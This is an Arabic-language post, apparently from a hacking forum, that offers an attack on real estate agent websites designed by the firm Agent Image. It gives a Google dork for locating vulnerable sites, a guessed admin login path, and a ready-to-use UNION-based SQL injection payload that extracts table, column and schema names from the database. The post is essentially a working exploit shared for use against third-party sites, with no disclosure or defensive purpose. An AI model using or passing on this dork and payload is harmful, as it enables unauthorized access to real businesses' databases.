السلام عليكم ورحمة الله وبركاتة
كيفكم شباب والله توحشتونى من امس لليوم
يلا خلينى نخش دغرى با الموضوع
معاى اليوم ثغرة بشركة Agent Image +الدورك الخاص+ شرح الاستغلال
والاستغلا راح يكون sql

خلينا نخش با الشرح
اولا دورك الثغرة الموجودة با الشركة
كود PHP:
Dork : intext:"Design by Agent Image" & inurl:agents_details.php?agent_ID=
ثانيا مسار اللوحة
كود:
cpanel:http://www.site.com/login.php
الاستغلال
كود:
http://www.site.com/{path}=-{number}'+ UNION SELECT 11111,211111,3111111,411111,group_concat(table_name,0x3a,column_name,0x3a,table_schema),611111+from+information_schema.columns+)-- -
انتهى شباب
ان اعجبك لا تنسانى من تقيماتك
الاهداء الى الجميع بلا استثناء
وتحياتى الى اخى الاكبر وحبيبى عبد الصمد
محمد الفسكاوى